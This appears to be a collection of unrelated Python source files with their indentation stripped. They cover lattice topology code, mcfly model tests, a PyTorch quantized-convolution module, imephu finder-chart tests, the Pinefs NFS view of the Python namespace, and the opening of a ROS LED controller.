for j in range(i, len(site_indices)):
idx_2 = site_indices[j]
nn = self.check_nearest_neighbour_sites(
site_1=coordinates[idx_1],
site_2=coordinates[idx_2],
)
if nn is True:
nearest_neighbours.append((idx_1, idx_2))
return nearest_neighbours
def add_site_1d_grid(self):
r"""Add site to topology if it is a 1D system."""
max_site_idx = max(list(self.coordinates.keys()))
new_site_idx = max_site_idx + 1
self.nearest_neighbours[new_site_idx] = []
new_coordinate = [new_site_idx, 1] # in 1d site ID is same as position
self.coordinates[new_site_idx] = new_coordinate
return new_site_idx
def add_site_2d_grid(self):
r"""Add site to topology if it is a 2D system."""
# grows in a manner which minimises area of the topology
rows = self.occupation["rows"]
cols = self.occupation["cols"]
row_values = rows.keys()
col_values = cols.keys()
min_span_row = None
min_span_col = None
for row_idx in rows:
span = max(rows[row_idx]) - min(rows[row_idx])
if min_span_row is None or span < min_span_row:
min_span_row = span
min_span_row_idx = row_idx
for col_idx in cols:
span = max(cols[col_idx]) - min(cols[col_idx])
if min_span_col is None or span < min_span_col:
min_span_col = span
min_span_col_idx = col_idx
if min_span_col < min_span_row:
# growing downward in y-axis
new_row = max(cols[min_span_col_idx]) + 1
new_col = min_span_col_idx
else:
# growing rightward in x-axis
new_col = max(rows[min_span_row_idx]) + 1
new_row = min_span_row_idx
new_coordinate = [new_row, new_col]
try:
self.occupation["rows"][new_row].append(new_col)
except BaseException:
self.occupation["rows"][new_row] = [new_col]
try:
self.occupation["cols"][new_col].append(new_row)
except BaseException:
self.occupation["cols"][new_col] = [new_row]
max_site_idx = max(list(self.coordinates.keys()))
new_site_idx = max_site_idx + 1
self.coordinates[new_site_idx] = new_coordinate
return new_site_idx
def add_sites_until_closed_topology(self):
r""" "
Continuosly add sites until topology is closed
(here, all sites have at least two nearest neighbours).
"""
# Add sites in such a way that all sites have at least two nearest neighbours
# Assumption to minimise energy -- not always necessary
all_sites_greater_than_2_nearest_neighbours = False
added_sites = []
while not all_sites_greater_than_2_nearest_neighbours:
# assumption: add_site() above is the intended growth step (add_new_coordinate_2d_lattice is undefined)
self.add_site()
new_site_idx = self.site_indices[-1]
nn_lists = list(self.nearest_neighbours.values())
num_nearest_neighbours = np.array([len(a) for a in nn_lists])
all_sites_greater_than_2_nearest_neighbours = np.all(
num_nearest_neighbours >= 2
)
added_sites.append(new_site_idx)
self.new_site_indices.append(added_sites)
def draw_topology(self, include_labels=True, save_to_file=None):
r"""Plot the current topology. For use in interactive sessions."""
import networkx as nx
plt.clf()
Graph = nx.Graph()
print("site indices:", self.site_indices)
for c in self.site_indices:
Graph.add_node(c)
Graph.nodes[c]["neighbours"] = self.nearest_neighbours[c]
Graph.nodes[c]["position"] = tuple(self.coordinates[c])
Graph.nodes[c]["label"] = str(c)
# Get positions and labels
positions = dict(
zip(
Graph.nodes(),
tuple([prop["position"] for (n, prop) in Graph.nodes(data=True)]),
)
)
label_positions = []
label_padding = 0.0
labels = dict(
zip(
Graph.nodes(),
tuple([prop["label"] for (n, prop) in Graph.nodes(data=True)]),
)
)
for key in positions.keys():
label_positions.append(
tuple(np.array(positions[key]) - np.array([0.0, label_padding]))
)
label_positions = dict(zip(positions.keys(), tuple(label_positions)))
# which nodes to connect (nearest neighbours)
edges = []
for c in self.site_indices:
# neighbours = self.nearest_neighbours[c]
neighbours = self.site_connections[c]
for n in neighbours:
edge = tuple(sorted([c, n]))
if edge not in edges:
edges.append(edge)
plt.gca().invert_yaxis() # so branch 0 on top
plt.title("Topology of system")
nx.draw_networkx_nodes(
Graph,
pos=positions,
node_size=600,
node_color="blue",
alpha=0.2,
)
if include_labels:
nx.draw_networkx_labels(
Graph, label_positions, labels, font_color="black", font_weight="bold"
)
nx.draw_networkx_edges(
Graph,
pos=self.coordinates,
edgelist=edges,
edge_color="grey",
alpha=0.8,
style="dashed",
label="Nearest neighbours",
)
self.Graph = Graph
if save_to_file is not None:
plt.savefig(save_to_file)
|
python
|
# -*- coding: utf-8 -*-
import unittest
from mcfly.models import DeepConvLSTM
from test_modelgen import get_default
class DeepConvLSTMSuite(unittest.TestCase):
"""
Tests cases for DeepconvLSTM models.
"""
def test_deepconvlstm_batchnorm_dim(self):
"""The output shape of the batchnorm should be (None, nr_timesteps, nr_channels, nr_filters)"""
model_type = DeepConvLSTM((None, 20, 3), 2)
model = model_type.create_model(**{"filters": [32, 32],
"lstm_dims": [32, 32]})
batchnormlay = model.layers[3]
assert batchnormlay.output_shape == (None, 20, 3, 32)
def test_deepconvlstm_enough_batchnorm(self):
"""LSTM model should contain as many batch norm layers as it has activations layers"""
model_type = DeepConvLSTM((None, 20, 3), 2)
model = model_type.create_model(**{"filters": [32, 32, 32],
"lstm_dims": [32, 32, 32]})
batch_norm_layers = len([l for l in model.layers if 'BatchNormalization' in str(l)])
activation_layers = len([l for l in model.layers if 'Activation' in str(l)])
assert batch_norm_layers == activation_layers
def test_DeepConvLSTM_hyperparameters_nrconvlayers(self):
""" Number of Conv layers from range [4, 4] should be 4. """
custom_settings = get_default()
kwargs = {'deepconvlstm_min_conv_layers': 4,
'deepconvlstm_max_conv_layers': 4}
# Replace default parameters with input
for key, value in kwargs.items():
if key in custom_settings:
custom_settings[key] = value
model_type = DeepConvLSTM(None, None, **custom_settings)
hyperparams = model_type.generate_hyperparameters()
assert len(hyperparams.get('filters')) == 4
def test_deepconvlstm_starts_with_batchnorm(self):
""" DeepConvLSTM models should always start with a batch normalization layer. """
model_type = DeepConvLSTM((None, 20, 3), 2)
model = model_type.create_model(**{"filters": [32, 32],
"lstm_dims": [32, 32]})
assert 'BatchNormalization' in str(type(model.layers[0])), 'Wrong layer type.'
if __name__ == '__main__':
unittest.main()
|
python
|
from collections import namedtuple
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd.function import InplaceFunction, Function
from sklearn.metrics.pairwise import cosine_similarity
from scipy.spatial.distance import cosine
import scipy.optimize as opt
__all__ = ['CPTConv2d']
QParams = namedtuple('QParams', ['range', 'zero_point', 'num_bits']) # a representation made of three parts (range, zero point, bit width)
_DEFAULT_FLATTEN = (1, -1)
_DEFAULT_FLATTEN_GRAD = (0, -1)
def _deflatten_as(x, x_full):
shape = list(x.shape) + [1] * (x_full.dim() - x.dim())
return x.view(*shape)
def mse(x, alpha, sign, xmax):
alpha = torch.from_numpy(alpha).to(x.device)
if sign:
x_clip = (x / alpha).clamp(0, xmax)
else:
x_clip = (x / alpha).clamp(-xmax, xmax)
x_q = x_clip.round()
x_q = x_q * alpha
return (((x_q - x) ** 2).sum() / x.numel()).cpu().item()
def get_alpha(x, sign, xmax):
# method1
# print('the x shape is : ' , x.shape)
alpha = x.view(x.shape[0], -1).max(axis=1)[0].topk(10)[0][-1] / xmax
mmse = lambda param: mse(x, param, sign=sign, xmax=xmax)
res = opt.minimize(mmse, (alpha.detach().cpu().numpy()), method='powell',
options={'disp': False, 'ftol': 0.05, 'maxiter': 100, 'maxfev': 100})
return torch.from_numpy(res.x).abs()
def calculate(x, num_bits, flatten_dims=_DEFAULT_FLATTEN, reduce_dim=0, reduce_type='mean', keepdim=False,
true_zero=False):
with torch.no_grad():
x_flat = x.flatten(*flatten_dims)
# range_values = max_values - min_values # range between max and min, then build a QParams namedtuple
# return QParams(range=range_values, zero_point=min_values,
# num_bits=num_bits)
def calculate_qparams(x, num_bits, flatten_dims=_DEFAULT_FLATTEN, reduce_dim=0, reduce_type='mean', keepdim=False,
true_zero=False):
with torch.no_grad():
x_flat = x.flatten(*flatten_dims)
if x_flat.dim() == 1: # flattening produced a 1-d tensor
min_values = _deflatten_as(x_flat.min(), x)
max_values = _deflatten_as(x_flat.max(), x)
else:
min_values = _deflatten_as(x_flat.min(-1)[0], x)
max_values = _deflatten_as(x_flat.max(-1)[0], x)
if reduce_dim is not None: # reduce along the given dimension (mean or extreme), honouring keepdim
if reduce_type == 'mean':
min_values = min_values.mean(reduce_dim, keepdim=keepdim)
max_values = max_values.mean(reduce_dim, keepdim=keepdim)
else:
min_values = min_values.min(reduce_dim, keepdim=keepdim)[0]
max_values = max_values.max(reduce_dim, keepdim=keepdim)[0]
range_values = max_values - min_values # range between max and min, packed into a QParams namedtuple below
return QParams(range=range_values, zero_point=min_values,
num_bits=num_bits)
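# Rough illustration of the helper above: with num_bits=8 (unsigned) a row spanning
# [0.0, 2.0] yields zero_point=0.0 and range=2.0, so quantize() below maps it onto
# the 0..255 integer grid with scale = 2.0 / 255.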
# This class implements plain uniform quantization, covering both the forward and backward passes
class UniformQuantize(InplaceFunction):
@staticmethod
def forward(ctx, input, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN,
reduce_dim=0, dequantize=True, signed=False, stochastic=False, inplace=False):
ctx.inplace = inplace
if ctx.inplace:
ctx.mark_dirty(input)
output = input
else:
output = input.clone()
if qparams is None:
assert num_bits is not None, "either provide qparams or num_bits to quantize"
qparams = calculate_qparams(
input, num_bits=num_bits, flatten_dims=flatten_dims, reduce_dim=reduce_dim)
# qparams were not given directly, so compute them from the input
zero_point = qparams.zero_point
num_bits = qparams.num_bits
qmin = -(2. ** (num_bits - 1)) if signed else 0. # signed vs. unsigned quantization
qmax = qmin + 2. ** num_bits - 1.
scale = qparams.range / (qmax - qmin) # scale follows directly from the stored range
min_scale = torch.tensor(1e-8).expand_as(scale).cuda() # smallest allowed scale
scale = torch.max(scale, min_scale) # clamp the scale from below
with torch.no_grad():
output.add_(qmin * scale - zero_point).div_(scale)
if stochastic:
noise = output.new(output.shape).uniform_(-0.5, 0.5)
output.add_(noise)
# quantize
output.clamp_(qmin, qmax).round_()
if dequantize:
output.mul_(scale).add_(
zero_point - qmin * scale) # dequantize
return output
@staticmethod
def backward(ctx, grad_output):
# straight-through estimator
grad_input = grad_output # straight-through estimator: quantization does not alter the gradient
return grad_input, None, None, None, None, None, None, None, None
class UniformQuantizeGrad(InplaceFunction):
@staticmethod
def forward(ctx, input, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN_GRAD,
reduce_dim=0, dequantize=True, signed=False, stochastic=True):
ctx.num_bits = num_bits
ctx.qparams = qparams
ctx.flatten_dims = flatten_dims
ctx.stochastic = stochastic
ctx.signed = signed
ctx.dequantize = dequantize
ctx.reduce_dim = reduce_dim
ctx.inplace = False
return input
@staticmethod
def backward(ctx, grad_output):
qparams = ctx.qparams
with torch.no_grad():
if qparams is None:
assert ctx.num_bits is not None, "either provide qparams or num_bits to quantize"
qparams = calculate_qparams(
grad_output, num_bits=ctx.num_bits, flatten_dims=ctx.flatten_dims, reduce_dim=ctx.reduce_dim,
reduce_type='extreme')
grad_input = quantize(grad_output, num_bits=None,
qparams=qparams, flatten_dims=ctx.flatten_dims, reduce_dim=ctx.reduce_dim,
dequantize=True, signed=ctx.signed, stochastic=ctx.stochastic, inplace=False)
return grad_input, None, None, None, None, None, None, None
def quantize(x, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN, reduce_dim=0, dequantize=True, signed=False,
stochastic=False, inplace=False):
# Two ways to control quantization: via a precomputed qparams object or via num_bits
if qparams: # range parameters were given explicitly
if qparams.num_bits: # and they carry a bit-width
return UniformQuantize().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed,
stochastic, inplace)
elif num_bits:
return UniformQuantize().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed, stochastic,
inplace)
return x
def quantize_grad(x, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN_GRAD, reduce_dim=0, dequantize=True,
signed=False, stochastic=True):
if qparams:
if qparams.num_bits:
return UniformQuantizeGrad().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed,
stochastic)
elif num_bits:
return UniformQuantizeGrad().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed,
stochastic)
return x
class QuantMeasure(nn.Module):
"""docstring for QuantMeasure."""
def __init__(self, shape_measure=(1,), flatten_dims=_DEFAULT_FLATTEN,
inplace=False, dequantize=True, stochastic=False, momentum=0.9, measure=False):
super(QuantMeasure, self).__init__()
self.register_buffer('running_zero_point', torch.zeros(*shape_measure))
self.register_buffer('running_range', torch.zeros(*shape_measure))
self.measure = measure
if self.measure:
self.register_buffer('num_measured', torch.zeros(1))
self.flatten_dims = flatten_dims
self.momentum = momentum
self.dequantize = dequantize
self.stochastic = stochastic
self.inplace = inplace
def forward(self, input, num_bits, qparams=None):
if self.training or self.measure:
if qparams is None:
qparams = calculate_qparams(
input, num_bits=num_bits, flatten_dims=self.flatten_dims, reduce_dim=0, reduce_type='extreme')
with torch.no_grad():
if self.measure:
momentum = self.num_measured / (self.num_measured + 1)
self.num_measured += 1
else:
momentum = self.momentum
self.running_zero_point.mul_(momentum).add_(
qparams.zero_point * (1 - momentum))
self.running_range.mul_(momentum).add_(
qparams.range * (1 - momentum))
else:
qparams = QParams(range=self.running_range,
zero_point=self.running_zero_point, num_bits=num_bits)
if self.measure:
return input
else:
q_input = quantize(input, qparams=qparams, dequantize=self.dequantize,
stochastic=self.stochastic, inplace=self.inplace)
return q_input
class CPTConv2d(nn.Conv2d):
"""docstring for QConv2d."""
def __init__(self, in_channels, out_channels, kernel_size,
stride=1, padding=0, dilation=1, groups=1, bias=True):
super(CPTConv2d, self).__init__(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, bias)
self.quantize_input = QuantMeasure(shape_measure=(1, 1, 1, 1), flatten_dims=(1, -1))
self.stride = stride
def forward(self, input, actbits, wbits, gbits):
if actbits == 0 and wbits==0:
output = F.conv2d(input, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
return output
if self.bias is not None:
qbias = quantize(
self.bias, num_bits=wbits,  # quantize the bias with the weight bit-width
flatten_dims=(0, -1))
else:
qbias = None
weight_qparams = calculate_qparams(self.weight, num_bits=wbits, flatten_dims=(1, -1),
reduce_dim=None)
qweight = quantize(self.weight, qparams=weight_qparams)
qinput = self.quantize_input(input, actbits)
output = F.conv2d(qinput, qweight, qbias, self.stride, self.padding, self.dilation, self.groups)
output = quantize_grad(output, num_bits=gbits, flatten_dims=(1, -1))
return output
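# A minimal usage sketch (hypothetical, not part of the original module): CPTConv2d takes the
# activation/weight/gradient bit-widths per forward call, so a training loop can vary them over
# time (the idea behind cyclic precision training). Passing actbits=0 and wbits=0 falls back to
# the plain full-precision convolution. The demo function name below is an illustration only.
def _cpt_conv2d_demo():
    conv = CPTConv2d(3, 8, kernel_size=3, padding=1, bias=False)
    x = torch.randn(2, 3, 16, 16)
    y_fp = conv(x, actbits=0, wbits=0, gbits=0)  # full-precision path
    y_q = conv(x, actbits=4, wbits=4, gbits=8)   # quantized weights/activations/gradients
    return y_fp.shape, y_q.shape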
# if __name__ == '__main__':
# x = torch.rand(2, 3)
# x_q = quantize(x, flatten_dims=(-1), num_bits=8, dequantize=True)
# print(x)
# print(x_q)
if __name__ == '__main__':
x = torch.randn(32, 3, 16, 16)
print(calculate_qparams(x, num_bits=8, flatten_dims=_DEFAULT_FLATTEN_GRAD))
|
python
|
import pytest
from astropy import units as u
from astropy.coordinates import SkyCoord
from imephu.annotation.general import CircleAnnotation, RectangleAnnotation
from imephu.finder_chart import FinderChart
def test_rectangle_annotation(fits_file, check_finder):
"""Test rectangle annotations."""
finder_chart = FinderChart(fits_file)
rectangle_annotation = RectangleAnnotation(
SkyCoord(ra="00h39m30s", dec="-59d59m00s"),
width=150 * u.arcsec,
height=2 * u.arcmin,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="blue",
alpha=0.2,
)
finder_chart.add_annotation(rectangle_annotation)
check_finder(finder_chart)
@pytest.mark.parametrize("angle", [0 * u.deg, 45 * u.deg])
def test_rectangle_annotation_rotated(
angle, fits_file, fits_center, check_finder, legend
):
"""Test rotated rectangle annotations."""
finder_chart = FinderChart(fits_file)
rectangle_annotation = RectangleAnnotation(
fits_center,
width=300 * u.arcsec,
height=150 * u.arcsec,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="gray",
alpha=0.2,
)
rotated_rectangle_annotation = rectangle_annotation.rotate(fits_center, angle)
rotated_rectangle_annotation._kwargs["facecolor"] = "blue"
pivot_marker = CircleAnnotation(
fits_center,
12 * u.arcsec,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="orange",
alpha=0.7,
)
finder_chart.add_annotation(pivot_marker)
finder_chart.add_annotation(rectangle_annotation)
finder_chart.add_annotation(rotated_rectangle_annotation)
finder_chart.add_annotation(
legend(f"Rotated by {angle.to_value(u.deg)} deg", wcs=finder_chart.wcs)
)
check_finder(finder_chart)
@pytest.mark.parametrize("displacement", [(0, 0) * u.arcmin, (2.5, -2) * u.arcmin])
def test_rectangle_annotation_translated(
displacement, fits_file, fits_center, check_finder, legend
):
"""Test translated rectangle annotations."""
finder_chart = FinderChart(fits_file)
rectangle_annotation = RectangleAnnotation(
fits_center,
width=100 * u.arcsec,
height=200 * u.arcsec,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="gray",
alpha=0.2,
)
translated_rectangle_annotation = rectangle_annotation.translate(displacement)
translated_rectangle_annotation._kwargs["facecolor"] = "blue"
finder_chart.add_annotation(rectangle_annotation)
finder_chart.add_annotation(translated_rectangle_annotation)
finder_chart.add_annotation(
legend(
f"Translated by {displacement.to_value(u.arcmin)} arcmin",
wcs=finder_chart.wcs,
)
)
check_finder(finder_chart)
|
python
|
#!/usr/bin/env python
# This file should be available from
# http://www.pobox.com/~asl2/software/Pinefs
# and is licensed under the X Consortium license:
# Copyright (c) 2003, Aaron S. Lav, [email protected]
# All rights reserved.
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, provided that the above
# copyright notice(s) and this permission notice appear in all copies of
# the Software and that both the above copyright notice(s) and this
# permission notice appear in supporting documentation.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
# OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
# INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
# FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
# WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Except as contained in this notice, the name of a copyright holder
# shall not be used in advertising or otherwise to promote the sale, use
# or other dealings in this Software without prior written authorization
# of the copyright holder.
"""Pyfs provides a view of Python namespace (rooted at sys.modules) as
a NFS filesystem. The implementation is imperfect, because I can't
think of anything in Python which can be used for the 'fileid'
attribute or the filehandle, independent of either the contents of the
object or its place in the filesystem. The compromise is to use a
cache (FileSystem._objs) to make sure that the same python directory
obj (defined as either an instance of a subclass of dict or dictproxy,
or an object which has a '__dict__' attribute) is always wrapped by
the same FileObj. All other objects (e.g. Python integers, strings)
are wrapped by a new FileObj (with a new fileid) for each different
access path through the Python namespace.
In order to handle writing to immutable types (such as strings and
integers), each FileObj contains the parent dictionary and key through
which it was first encountered, and writing to regular files is
implemented by creating a new object and binding it as the new value
for that key in the parent dictionary. (For writing to directories,
the dictionary is mutated in place.) The new object's value is obtained
by stringifying the value (with str()), creating a new string by
replacing the indicated part of the old string, and then passing the
new string to type(val). If the type object (e.g. for functions)
doesn't accept a string as parameter, we report NFSERR_ACCES. (Yes,
this is a bunch of overhead.)
For directories, instead of just using the __dict__, we probably
should track the logic used in 'dir' (or just call 'dir'), while being
aware that accesses to attributes returned from dir can raise
AttributeError (e.g. __slots__). Currently, we don't implement access
to the __class__ attribute of class instances, attributes defined with
__slots__ (or other attributes defined by means of attribute
descriptors), or to dynamically-generated attributes generated by
manipulating __getattr__/__getattribute__. (The general problem seems
insoluble, at least without an assist from the __members__ attribute.)
Note that hard links to non-directories don't work with this system.
(A hard link request is currently implemented as a copy.) To fix this, a
FileObj could have a list of (parent_dict, key) tuples, and a write
would iterate over the list and rebind each parent_dict[key].
XXX This code isn't safe if the Python side mutates directories
exactly when the NFS code is reading them. When it's rewritten to be
safe, test by pausing NFS code at important points (e.g. inside
refresh_dir), waiting for the user to mutate stuff at the python
console, and then signal to continue from console.
Here's a useless example (except for testing purposes):
find . -name __doc__ -noleaf -exec grep "maxint" \{\} /dev/null \;
(executed in root of NFS mount)
Note that there are many paths through the Python namespace to the
module sys, which currently has the only docstring with maxint in it
(unless this module is imported), and that find prints all of them.
(pyfs returns the same filehandle and fileid each time, so it is
possible to realize they're all duplicates.)
"""
import sys
import string
import rfc1094
import fsbase
import types
trace_fh = 0
def get_dict (obj):
if isinstance (obj, types.DictType) or isinstance (obj, types.DictProxyType):
return obj
return getattr (obj, '__dict__', None)
# sometimes obj has a __dict__ attribute which is None. This
# still does what we want.
class FileObj(fsbase.FileObj):
fileid_ctr = fsbase.Ctr (randomize_start = 1)
# can't g'tee persistence of file ids, 2nd best is to
# randomize them so previous incarnations will get ESTALE
def __init__ (self, parent_dict, key, fs):
self.fs = fs
self.parent_dict = parent_dict
self.key = key
self.fileid = self.fileid_ctr.next ()
obj = self.parent_dict [self.key]
dict = get_dict (obj)
if dict <> None:
self.set_dict (dict)
else:
self.type = rfc1094.NFREG
self.data = self.get_data ()
nlink = self.get_nlink ()
# XXX ideally this would be property, but interacts poorly w/
# getattr in fsbase
fsbase.FileObj.__init__ (self)
def get_nlink (self):
if self.type == rfc1094.NFDIR:
return sys.getrefcount (self.parent_dict[self.key])
else:
return 1
def set_dict (self, dict_obj):
self.type = rfc1094.NFDIR
self.dict = dict_obj
self.size = len (dict_obj)
self.dir = {}
self.blocks = 1
def get_data (self):
try:
return str (self.parent_dict[self.key])
except KeyError, k:
print "weird, key %s missing from %s" % (str(self.key),
str(self.parent_dict.keys()))
return ''
def read (self, offset, count):
self.data = self.get_data ()
return self.data [offset: offset + count]
def write (self, offset, newdata):
old_data = self.get_data ()
old_len = len (old_data)
if offset > old_len:
fill = '\0' * (offset - old_len)
else:
fill = ''
new_data = (old_data[:offset] + fill + newdata +
old_data[offset + len (newdata):])
self.change_val (new_data)
def change_val (self, *args):
try:
new_val = type(self.parent_dict[self.key]) (*args)
except (TypeError, ValueError):
raise fsbase.NFSError (rfc1094.NFSERR_ACCES)
self.parent_dict[self.key] = new_val
self.data = self.get_data ()
self.set_size ()
# This is "rebind", not "mutate".
self.mtime = fsbase.mk_now ()
def truncate (self):
"""Note that for non-strings, 0-len data is usually invalid, so we
interpret 'truncate' liberally"""
self.change_val ()
def check_changed (self):
"""Called on every access. Stringifies data, and compares it
with old value to see if it's changed (so that when the python
side changes a value, we reflect that with a changed mtime in
GETATTR, and the NFS client can reread if necessary. This is
comparatively heavyweight, and maybe there should be a flag to
turn it off."""
if self.type <> rfc1094.NFDIR:
new_data = self.get_data ()
if new_data <> self.data:
self.mtime = fsbase.mk_now ()
self.data = new_data
self.set_size ()
# __{get,set,del}item__ are implemented to ease manipulating both self.dict
# (the dict of the python object, with python objects as vals) and self.dir,
# which contains NFS file handles for those objects, at the same time,
# and keeping them consistent. They take and return tuples of (fh, obj)
def __getitem__ (self, key):
return self.dir [key], self.dict [key]
def __setitem__ (self, key, val):
fh, obj = val
self.dict [key] = obj
self.dir [key] = fh
def __delitem__ (self, key):
del self.dict [key] # try dict first!
del self.dir [key]
def set_dir (self, key, fh):
if fh <> None:
self.dir [key] = fh
else:
del self.dir [key]
def get_dir (self):
# It would be nice if there were a cheap way to tell if
# self.dict had changed at all, rather than just checking for
# length changes. So we miss some alterations. I guess we
# could have a timestamp, so we refresh the directory when the
# length changes, or every n seconds. Alternately, we could
# just save old_dict and compare .items (), since we're doing
# the moral equivalent for files.
if self.dir == None or len(self.dir) <> len (self.dict):
self.refresh_dir ()
return self.dir
def refresh_dir (self):
# exclude _fils, _objs to avoid apps traversing entire directory tree
# from looping forever
if (self.dict <> self.fs._fils and
self.dict <> self.fs._objs):
old_dir = self.dir
self.dir = {}
# Avoid names with '/' because my Linux 2.4.19 seems to get slightly
# confused with them. (E.g. a name of '/' by itself is a link to the
# root of the directory hierarchy, even if it's a Python string and
# thus ought to be a leaf.) Ideally I'd escape them, so they were
# still accessible somehow.
# XXX Avoiding '/'s means len's won't match, we'll refresh every time through
for (k, v) in self.dict.items ():
if isinstance (k, type ('')):
if k.find ('/') <> -1:
continue
fh = old_dir.get (k, None)
if fh == None:
fh = self.fs.find_or_create (self.dict, k)
else:
del old_dir [k]
self.dir [str(k)] = fh
# XXX old_dir now contains filehandles that there may be no other way
# to reach (certainly if they refer to non-directories).
# On one hand, to provide Unix semantics, if the client still
# has that filehandle, it can refer to it forever:
# on the other, it's a memory leak (from fs._fils and fs._objs)
# if it does. Note that the only way this can arise is to
# delete things from the python side, since any manipulation
# through the NFS side maintains dict and dir in sync (unless it's buggy).
# Maybe the way to resolve this is to keep a link count for directory-like
# objects (since we can rely on identity for them), purging when the link
# count reaches 0: for others, put the filehandles in a dictionary
# of fh's to be purged, and
# - keep them in, er, purgatory (resetting the last access time) if they're
# used by a client through an old file handle
# - otherwise delete them after a decent interval
def mk_link (self, name, from_fh):
from_fil = self.fs.get_fil (from_fh)
self.dict [name] = from_fil.parent_dict [from_fil.key]
self.set_dir (name,from_fh)
class FileSystem:
def __init__ (self):
self._fh_ctr = fsbase.Ctr (randomize_start = 1)
self._fils = {} # map fh to FileObj
self._objs = {} # map id to (obj, fh)
self._root = self.find_or_create (sys.__dict__, 'modules')
def mount (self, dirpath):
if dirpath == '/':
return self._root
return None
def find_or_create (self, dict, key):
py_obj = dict[key]
d = get_dict (py_obj)
if d <> None:
tup = self._objs.get (id (py_obj))
else:
tup = None
if tup == None:
fh = self._fh_ctr.next_fh ()
fattr = FileObj (dict, key, self)
if trace_fh: print "creating fh %s key %s" % (fh, str(key))
self._fils [fh] = fattr
if d <> None:
self._objs [id(py_obj)] = (py_obj, fh)
return fh
else:
# XXX tup [0] should be weak ref, but until then, we're
# certain that tup [0] == py_obj
assert (tup [0] == py_obj)
fh = tup [1]
return fh
def get_fil (self, fh):
f = self._fils.get (fh, None)
if f <> None:
f.check_changed ()
f.atime = fsbase.mk_now ()
return f
def rename (self, old_dir, old_name, new_dir, new_name):
# print "rename", old_name, new_name
old_fil = self.get_fil (old_dir)
new_fil = self.get_fil (new_dir)
move_fh = old_fil.get_dir () [old_name]
move_fil = self.get_fil (move_fh)
new_fil [new_name] = (move_fh, move_fil.parent_dict [move_fil.key])
move_fil.key = new_name
del old_fil [old_name]
def create_fil (self, dir_fh, name, **kw):
dir_fil = self.get_fil (dir_fh)
if kw['type'] == rfc1094.NFDIR:
new_val = {}
else:
new_val = kw.get ('data', '')
dir_fil.refresh_dir ()
dir_fil.dict [name] = new_val
fh = self.find_or_create (dir_fil.dict, name)
dir_fil.set_dir (name,fh)
return fh, self.get_fil (fh)
def remove (self, dir_fh, name):
dir_fil = self.get_fil (dir_fh)
try:
old_fh = dir_fil.get_dir ()[name]
old_fil = self.get_fil (old_fh)
py_obj = old_fil.parent_dict [old_fil.key]
if old_fil.type == rfc1094.NFDIR:
if old_fil.dict <> {}:
raise fsbase.NFSError (rfc1094.NFSERR_NOTEMPTY)
del dir_fil[name]
except TypeError:
# NFSERR_ACCES isn't quite right, because it implies
# that some user could delete this.
raise fsbase.NFSError (rfc1094.NFSERR_ACCES)
except KeyError:
raise fsbase.NFSError (rfc1094.NFSERR_NOENT)
del self._fils [old_fh]
d = get_dict (py_obj)
if d <> None:
del self._objs [id(py_obj)]
|
python
|
#!/usr/bin/env python
import rospy
import cv2
from sensor_msgs.msg import Image
from std_msgs.msg import Float64MultiArray, UInt8
from std_srvs.srv import Trigger, TriggerResponse
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
from scipy import optimize
import time
class linear_controller(object):
def __init__(self):
# ROS Framework
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("~image_raw", Image, self.image_cb)
self.led_sub = rospy.Subscriber("~pwm", Float64MultiArray, self.led_cb)
self.led_pub = rospy.Publisher("~pwm", Float64MultiArray, queue_size=10)
self.calibrate_srv = rospy.Service("~calibrate", Trigger, self.calibrate)
self.mask_capture_srv = rospy.Service("~capture", Trigger, self.capture_masks)
self.level_sub = rospy.Subscriber("~level", UInt8, self.update_leds)
# ROS Parameters
self.pre_flash_value = rospy.get_param("~pre_flash_value", 0.5)
self.pre_flash_time = rospy.get_param("~pre_flash_time", 0.1)
self.image_width = rospy.get_param("~image_width", 2048)
self.image_height = rospy.get_param("~image_height", 1536)
self.cropped_width = rospy.get_param("~cropped_width", 500)
self.cropped_height = rospy.get_param("~cropped_height", self.image_height)
self.led_a = rospy.get_param("~led_a", 1)
self.led_b = rospy.get_param("~led_b", 1)
self.led_c = rospy.get_param("~led_c", 0)
self.led_d = rospy.get_param("~led_d", 0)
self.n_leds = self.led_a + self.led_b + self.led_c + self.led_d
self.debug = rospy.get_param("~debug", True)
# LED Mapping Array
self.led_array = []
if self.led_a == 1:
self.led_array.append(0)
if self.led_b == 1:
self.led_array.append(1)
if self.led_c == 1:
self.led_array.append(2)
if self.led_d == 1:
self.led_array.append(3)
# Current State of LED's
self.initialized = False
self.current_state = None
self.background = np.zeros([self.cropped_height, self.cropped_width])
self.last_frame = None
# Control Matrices
self.responses = [None, None, None, None]
self.A_initialized = False
